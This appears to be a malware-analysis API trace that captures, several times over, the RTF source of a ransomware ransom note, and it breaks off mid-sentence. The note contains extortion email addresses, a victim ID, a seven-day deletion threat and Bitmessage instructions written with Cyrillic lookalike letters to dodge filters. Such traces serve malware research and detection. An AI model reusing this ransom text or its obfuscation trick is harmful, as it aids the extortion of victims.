FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0280.283] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0280.283] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x2358878, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 